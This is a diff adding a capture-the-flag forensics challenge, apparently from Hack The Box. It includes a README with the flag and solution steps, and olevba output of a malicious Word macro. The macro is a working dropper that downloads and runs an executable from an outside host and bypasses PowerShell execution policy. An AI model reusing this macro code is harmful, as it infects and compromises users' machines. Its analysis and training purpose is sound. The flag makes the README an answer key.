diff --git a/forensics/giveaway/Pipfile b/forensics/giveaway/Pipfile new file mode 100644 index 0000000..af54851 --- /dev/null +++ b/forensics/giveaway/Pipfile @@ -0,0 +1,12 @@ +[[source]] +url = "https://pypi.org/simple" +verify_ssl = true +name = "pypi" + +[packages] +oletools = "*" + +[dev-packages] + +[requires] +python_version = "3.9" diff --git a/forensics/giveaway/Pipfile.lock b/forensics/giveaway/Pipfile.lock new file mode 100644 index 0000000..261ecd0 --- /dev/null +++ b/forensics/giveaway/Pipfile.lock @@ -0,0 +1,161 @@ +{ + "_meta": { + "hash": { + "sha256": "05c72e7e1a8730ddb6e1c2f1b36ca17367b4584020b0c0b462958863fa93d803" + }, + "pipfile-spec": 6, + "requires": { + "python_version": "3.9" + }, + "sources": [ + { + "name": "pypi", + "url": "https://pypi.org/simple", + "verify_ssl": true + } + ] + }, + "default": { + "cffi": { + "hashes": [ + "sha256:00c878c90cb53ccfaae6b8bc18ad05d2036553e6d9d1d9dbcf323bbe83854ca3", + "sha256:0104fb5ae2391d46a4cb082abdd5c69ea4eab79d8d44eaaf79f1b1fd806ee4c2", + "sha256:06c48159c1abed75c2e721b1715c379fa3200c7784271b3c46df01383b593636", + "sha256:0808014eb713677ec1292301ea4c81ad277b6cdf2fdd90fd540af98c0b101d20", + "sha256:10dffb601ccfb65262a27233ac273d552ddc4d8ae1bf93b21c94b8511bffe728", + "sha256:14cd121ea63ecdae71efa69c15c5543a4b5fbcd0bbe2aad864baca0063cecf27", + "sha256:17771976e82e9f94976180f76468546834d22a7cc404b17c22df2a2c81db0c66", + "sha256:181dee03b1170ff1969489acf1c26533710231c58f95534e3edac87fff06c443", + "sha256:23cfe892bd5dd8941608f93348c0737e369e51c100d03718f108bf1add7bd6d0", + "sha256:263cc3d821c4ab2213cbe8cd8b355a7f72a8324577dc865ef98487c1aeee2bc7", + "sha256:2756c88cbb94231c7a147402476be2c4df2f6078099a6f4a480d239a8817ae39", + "sha256:27c219baf94952ae9d50ec19651a687b826792055353d07648a5695413e0c605", + "sha256:2a23af14f408d53d5e6cd4e3d9a24ff9e05906ad574822a10563efcef137979a", + "sha256:31fb708d9d7c3f49a60f04cf5b119aeefe5644daba1cd2a0fe389b674fd1de37", + "sha256:3415c89f9204ee60cd09b235810be700e993e343a408693e80ce7f6a40108029", + "sha256:3773c4d81e6e818df2efbc7dd77325ca0dcb688116050fb2b3011218eda36139", + "sha256:3b96a311ac60a3f6be21d2572e46ce67f09abcf4d09344c49274eb9e0bf345fc", + "sha256:3f7d084648d77af029acb79a0ff49a0ad7e9d09057a9bf46596dac9514dc07df", + "sha256:41d45de54cd277a7878919867c0f08b0cf817605e4eb94093e7516505d3c8d14", + "sha256:4238e6dab5d6a8ba812de994bbb0a79bddbdf80994e4ce802b6f6f3142fcc880", + "sha256:45db3a33139e9c8f7c09234b5784a5e33d31fd6907800b316decad50af323ff2", + "sha256:45e8636704eacc432a206ac7345a5d3d2c62d95a507ec70d62f23cd91770482a", + "sha256:4958391dbd6249d7ad855b9ca88fae690783a6be9e86df65865058ed81fc860e", + "sha256:4a306fa632e8f0928956a41fa8e1d6243c71e7eb59ffbd165fc0b41e316b2474", + "sha256:57e9ac9ccc3101fac9d6014fba037473e4358ef4e89f8e181f8951a2c0162024", + "sha256:59888172256cac5629e60e72e86598027aca6bf01fa2465bdb676d37636573e8", + "sha256:5e069f72d497312b24fcc02073d70cb989045d1c91cbd53979366077959933e0", + "sha256:64d4ec9f448dfe041705426000cc13e34e6e5bb13736e9fd62e34a0b0c41566e", + "sha256:6dc2737a3674b3e344847c8686cf29e500584ccad76204efea14f451d4cc669a", + "sha256:74fdfdbfdc48d3f47148976f49fab3251e550a8720bebc99bf1483f5bfb5db3e", + "sha256:75e4024375654472cc27e91cbe9eaa08567f7fbdf822638be2814ce059f58032", + "sha256:786902fb9ba7433aae840e0ed609f45c7bcd4e225ebb9c753aa39725bb3e6ad6", + "sha256:8b6c2ea03845c9f501ed1313e78de148cd3f6cad741a75d43a29b43da27f2e1e", + "sha256:91d77d2a782be4274da750752bb1650a97bfd8f291022b379bb8e01c66b4e96b", + "sha256:91ec59c33514b7c7559a6acda53bbfe1b283949c34fe7440bcf917f96ac0723e", + "sha256:920f0d66a896c2d99f0adbb391f990a84091179542c205fa53ce5787aff87954", + "sha256:a5263e363c27b653a90078143adb3d076c1a748ec9ecc78ea2fb916f9b861962", + "sha256:abb9a20a72ac4e0fdb50dae135ba5e77880518e742077ced47eb1499e29a443c", + "sha256:c2051981a968d7de9dd2d7b87bcb9c939c74a34626a6e2f8181455dd49ed69e4", + "sha256:c21c9e3896c23007803a875460fb786118f0cdd4434359577ea25eb556e34c55", + "sha256:c2502a1a03b6312837279c8c1bd3ebedf6c12c4228ddbad40912d671ccc8a962", + "sha256:d4d692a89c5cf08a8557fdeb329b82e7bf609aadfaed6c0d79f5a449a3c7c023", + "sha256:da5db4e883f1ce37f55c667e5c0de439df76ac4cb55964655906306918e7363c", + "sha256:e7022a66d9b55e93e1a845d8c9eba2a1bebd4966cd8bfc25d9cd07d515b33fa6", + "sha256:ef1f279350da2c586a69d32fc8733092fd32cc8ac95139a00377841f59a3f8d8", + "sha256:f54a64f8b0c8ff0b64d18aa76675262e1700f3995182267998c31ae974fbc382", + "sha256:f5c7150ad32ba43a07c4479f40241756145a1f03b43480e058cfd862bf5041c7", + "sha256:f6f824dc3bce0edab5f427efcfb1d63ee75b6fcb7282900ccaf925be84efb0fc", + "sha256:fd8a250edc26254fe5b33be00402e6d287f562b6a5b2152dec302fa15bb3e997", + "sha256:ffaa5c925128e29efbde7301d8ecaf35c8c60ffbcd6a1ffd3a552177c8e5e796" + ], + "version": "==1.15.0" + }, + "colorclass": { + "hashes": [ + "sha256:b05c2a348dfc1aff2d502527d78a5b7b7e2f85da94a96c5081210d8e9ee8e18b" + ], + "version": "==2.2.0" + }, + "cryptography": { + "hashes": [ + "sha256:2049f8b87f449fc6190350de443ee0c1dd631f2ce4fa99efad2984de81031681", + "sha256:231c4a69b11f6af79c1495a0e5a85909686ea8db946935224b7825cfb53827ed", + "sha256:24469d9d33217ffd0ce4582dfcf2a76671af115663a95328f63c99ec7ece61a4", + "sha256:2deab5ec05d83ddcf9b0916319674d3dae88b0e7ee18f8962642d3cde0496568", + "sha256:494106e9cd945c2cadfce5374fa44c94cfadf01d4566a3b13bb487d2e6c7959e", + "sha256:4c702855cd3174666ef0d2d13dcc879090aa9c6c38f5578896407a7028f75b9f", + "sha256:52f769ecb4ef39865719aedc67b4b7eae167bafa48dbc2a26dd36fa56460507f", + "sha256:5c49c9e8fb26a567a2b3fa0343c89f5d325447956cc2fc7231c943b29a973712", + "sha256:684993ff6f67000a56454b41bdc7e015429732d65a52d06385b6e9de6181c71e", + "sha256:6fbbbb8aab4053fa018984bb0e95a16faeb051dd8cca15add2a27e267ba02b58", + "sha256:8982c19bb90a4fa2aad3d635c6d71814e38b643649b4000a8419f8691f20ac44", + "sha256:9511416e85e449fe1de73f7f99b21b3aa04fba4c4d335d30c486ba3756e3a2a6", + "sha256:97199a13b772e74cdcdb03760c32109c808aff7cd49c29e9cf4b7754bb725d1d", + "sha256:a776bae1629c8d7198396fd93ec0265f8dd2341c553dc32b976168aaf0e6a636", + "sha256:aa94d617a4cd4cdf4af9b5af65100c036bce22280ebb15d8b5262e8273ebc6ba", + "sha256:b17d83b3d1610e571fedac21b2eb36b816654d6f7496004d6a0d32f99d1d8120", + "sha256:d73e3a96c38173e0aa5646c31bf8473bc3564837977dd480f5cbeacf1d7ef3a3", + "sha256:d91bc9f535599bed58f6d2e21a2724cb0c3895bf41c6403fe881391d29096f1d", + "sha256:ef216d13ac8d24d9cd851776662f75f8d29c9f2d05cdcc2d34a18d32463a9b0b", + "sha256:f6a5a85beb33e57998dc605b9dbe7deaa806385fdf5c4810fb849fcd04640c81", + "sha256:f92556f94e476c1b616e6daec5f7ddded2c082efa7cee7f31c7aeda615906ed8" + ], + "markers": "python_version >= '3.6'", + "version": "==36.0.0" + }, + "easygui": { + "hashes": [ + "sha256:073f728ca88a77b74f404446fb8ec3004945427677c5618bd00f70c1b999fef2", + "sha256:8d38764803c27bbccab2771e6c021cb20647049b36617f765fac79f01af07a27" + ], + "version": "==0.98.2" + }, + "msoffcrypto-tool": { + "hashes": [ + "sha256:234f85ef59945fa1ebb618ca029f31f0cb43a637344dbda5c1bb8578b2d96a68", + "sha256:7f04b621365e3753f8cef8ba40536acc23d0d201c0ad2dcb1b3d82c83056b7ff" + ], + "markers": "python_version >= '3' and platform_python_implementation != 'PyPy' or (platform_system != 'Windows' and platform_system != 'Darwin')", + "version": "==4.12.0" + }, + "olefile": { + "hashes": [ + "sha256:133b031eaf8fd2c9399b78b8bc5b8fcbe4c31e85295749bb17a87cba8f3c3964" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==0.46" + }, + "oletools": { + "hashes": [ + "sha256:bad54d3ced34f3475a5bffc0122f8481c66c3f3e09ad946dbda6ec80b75f72cb", + "sha256:dfad0328ac83b4f8db9f47e706cbd64db739ae4ebf9d98b2dcc465728a35f4a6" + ], + "index": "pypi", + "version": "==0.60" + }, + "pcodedmp": { + "hashes": [ + "sha256:025f8c809a126f45a082ffa820893e6a8d990d9d7ddb68694b5a9f0a6dbcd955", + "sha256:4441f7c0ab4cbda27bd4668db3b14f36261d86e5059ce06c0828602cbe1c4278" + ], + "version": "==1.2.6" + }, + "pycparser": { + "hashes": [ + "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9", + "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206" + ], + "version": "==2.21" + }, + "pyparsing": { + "hashes": [ + "sha256:c203ec8783bf771a155b207279b9bccb8dea02d8f0c9e5f8ead507bc3246ecc1", + "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b" + ], + "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==2.4.7" + } + }, + "develop": {} +} diff --git a/forensics/giveaway/README.md b/forensics/giveaway/README.md new file mode 100644 index 0000000..6829901 --- /dev/null +++ b/forensics/giveaway/README.md @@ -0,0 +1,34 @@ +# Giveaway + +Santa's SOC team is working overtime during December due to Christmas phishing +campaigns. A new team of malicious actors is targeting mainly those affected by +the holiday spirit. Could you analyse the document and find the command & +control server? + +## Flag + +HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s} + +## How to solve + +- The giveaway.docm file is a word file with enabled macros +- Use oletools to extract any vba code `olevba -c christmas_giveaway.docm > macros.vba` +- By analyzing the vba macro it is quite obvious which part is the obfuscated c&c address + +```vba +Module VBModule + Sub Main() + Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String + HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4" + cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10) + fqtSMHFlkYeyLfs = Replace("everybody", "e", "3") + fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_" + ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95) + FVpHoEqBKnhPO = Replace("christmas", "i", "1") + FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6) + Console.WriteLine(HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO) + End Sub +End Module +``` + +- Execute this part of the script in any vba online compiler and get the flag. diff --git a/forensics/giveaway/christmas_giveaway.docm b/forensics/giveaway/christmas_giveaway.docm new file mode 100644 index 0000000..489a248 Binary files /dev/null and b/forensics/giveaway/christmas_giveaway.docm differ diff --git a/forensics/giveaway/macros.vba b/forensics/giveaway/macros.vba new file mode 100644 index 0000000..5d374db --- /dev/null +++ b/forensics/giveaway/macros.vba @@ -0,0 +1,317 @@ +olevba 0.60 on Python 3.9.8 - http://decalage.info/python/oletools +=============================================================================== +FILE: christmas_giveaway.docm +Type: OpenXML +------------------------------------------------------------------------------- +VBA MACRO ThisDocument.cls +in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +Sub Auto_Open() + h +End Sub +Sub h() +Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR + USER = Environ("username") + PST1 = "adobeacd-update.p" + Chr(115) + "1" + BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t")) + ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl" + VBT1 = "adobeacd-update." + Chr(118) + "bs" + VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s" + + + MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 + ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad" + MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + XPFILEDIR = "c:\Windows\Temp\" + VBTXP + XPBARTFILEDIR = "c:\Windows\Temp\" + BART + + On Error Resume Next + SetAttr MY_FILENDIR, vbNormal + + If (Len(Dir(MY_FILENDIR)) <> 0) Then + Kill MY_FILENDIR + End If + + On Error Resume Next + SetAttr MY_FILEDIR, vbNormal + If (Dir(MY_FILEDIR) <> "") Then + Kill MY_FILEDIR + End If + + On Error Resume Next + SetAttr MY_FILDIR, vbNormal + If (Dir(MY_FILDIR) <> "") Then + Kill MY_FILDIR + End If + + On Error Resume Next + SetAttr XPFILEDIR, vbNormal + If (Dir(XPFILEDIR) <> "") Then + Kill XPFILEDIR + End If + + Dim FileNumber As Integer + Dim FileNumb As Integer + Dim FileNu As Integer + Dim mttt As Integer + Dim retVal As Variant + 'Dim winver As Integer + FileNumber = FreeFile + FileNumb = FreeFile + FileNu = FreeFile + + Dim objWMIService As Variant + Dim colOperatingSystems As Variant + Dim objOperatingSystem As Variant + Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") + Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") + For Each objOperatingSystem In colOperatingSystems + SysReport = SysReport & "The operating system on this computer is " & _ + objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")" + Next + + Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") + Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") + For Each objOperatingSystem In colOperatingSystems + winverstr = objOperatingSystem.Version + Next + + + winver = Val(winverstr) + WaitFor (1) + + +If (winver > 5.5) Then + Open MY_FILENDIR For Output As #FileNumber + Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';" + Print #FileNumber, "$hash = '0';" + Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;" + Print #FileNumber, "$url = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';" + Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';" + Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';" + Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);" + Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;" + Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';" + Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';" + Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';" + Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';" + Print #FileNumber, "Start-Sleep -s 15;" + Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; " + Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force" + Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force" + Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force" + Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" + Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" + Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" + Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }" + Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }" + Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }" + Print #FileNumber, "Remove-Item $MyINvocation.InvocationName" + Close #FileNumber + + Open MY_FILDIR For Output As #FileNumb + Print #FileNumb, "Dim dff" + Print #FileNumb, "dff = 68" + Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))" + Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")" + Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34) + Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true" + Close #FileNumb + + Open MY_FILEDIR For Output As #FileNu + Print #FileNu, "@echo off" + Print #FileNu, "ping 1.1.2.2 -n 2" + Print #FileNu, "chcp 1251" + Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34) + Print #FileNu, "exit" + Close #FileNu + + SetAttr MY_FILENDIR, vbNormal + SetAttr MY_FILEDIR, vbNormal + SetAttr MY_FILDIR, vbNormal + + WaitFor (1) + + retVal = Shell(MY_FILEDIR, 0) +End If + +If (winver <= 5.5) Then + Open XPBARTFILEDIR For Output As #FileNu + Print #FileNu, "@echo off" + Print #FileNu, "ping 1.1.2.2 -n 2" + Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + Print #FileNu, "ping 1.1.2.2 -n 2" + Print #FileNu, "c:\Windows\Temp\444.exe" + Print #FileNu, ":loop" + Print #FileNu, "ping 1.1.2.2 -n 1" + Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop" + Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop" + Print #FileNu, "exit" + Close #FileNu + WaitFor (2) + mttt = 88 + + Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String + + HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4" + cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10) + fqtSMHFlkYeyLfs = Replace("everybody", "e", "3") + fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_" + ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95) + FVpHoEqBKnhPO = Replace("christmas", "i", "1") + FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6) + + Open XPFILEDIR For Output As #FileNumber + Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO" + Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34) + + Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")" + Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False" + + Print #FileNumber, "objXMLHTTP.send() " + Print #FileNumber, "If objXMLHTTP.Status = 200 Then" + + Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") " + + Print #FileNumber, "objADOStream.Open " + Print #FileNumber, "objADOStream.Type = 1" + Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody " + Print #FileNumber, "objADOStream.Position = 0 " + Print #FileNumber, "objADOStream.SaveToFile strTecation " + Print #FileNumber, "objADOStream.Close " + Print #FileNumber, "Set objADOStream = Nothing " + Print #FileNumber, "End if " + Print #FileNumber, "Set objXMLHTTP = Nothing" + Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")" + Close #FileNumber + + WaitFor (1) + + retVal = Shell(XPBARTFILEDIR, 0) + + +End If + + + findTest + secondTest + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "<" & "sel" & "ect>" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "<" & "in" & "box>" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + +End Sub +Sub WaitFor(NumOfSeconds As Long) +Dim SngSec As Long +SngSec = Timer + NumOfSeconds + +Do While Timer < SngSec +DoEvents +Loop + +End Sub + +Sub AutoOpen() + Auto_Open +End Sub +Sub Workbook_Open() + Auto_Open +End Sub +Sub findTest() +Dim firstTerm As String +Dim secondTerm As String +Dim rrtt As Range +Dim selRange As Range +Dim selectedText As String + +Set rrtt = ActiveDocument.Range +firstTerm = "" +secondTerm = "" +ASKASAIEJ = "ask as8d j vnbnfghfthfth sad" +With rrtt.Find +.Text = firstTerm +.MatchWholeWord = True +.Execute +ASKUKKIEJ = "aasdlkasjdask as8d j vnbnfghfthfth sad" +rrtt.Collapse direction:=wdCollapseEnd +Set selRange = ActiveDocument.Range +selRange.Start = rrtt.End +.Text = secondTerm +.MatchWholeWord = True +.Execute +ASKSASADW = "asjldklas" +rrtt.Collapse direction:=wdCollapseStart +selRange.End = rrtt.Start +selectedText = selRange.Delete +End With +End Sub + +Sub secondTest() +Dim firstTerm As String +Dim secondTerm As String +Dim myRanget As Range +Dim yytt As Range +Dim selRanget As Range +Dim selectedTextt As String + +Set yytt = ActiveDocument.Range +firstTerm = "" +secondTerm = "" +ASKIEJSASAHBDJ = "ask as8d j asdasl;a adfsdvsdgsdfsdf sad" +With yytt.Find +.Text = firstTerm +.MatchWholeWord = True +.Execute +ASKIEJ = "ask as8d j vnbnfghfthfth sad" +yytt.Collapse direction:=wdCollapseEnd +ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a adfsdvsdgsdfsdf sad" +Set selRanget = ActiveDocument.Range +selRanget.Start = yytt.End +.Text = secondTerm +.MatchWholeWord = True +.Execute +ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a adfsdvsdgsdfsdf sad" +yytt.Collapse direction:=wdCollapseStart +selRanget.End = yytt.Start +selectedTextt = selRanget +selRanget.Font.Color = wdColorBlack +End With +End Sub + +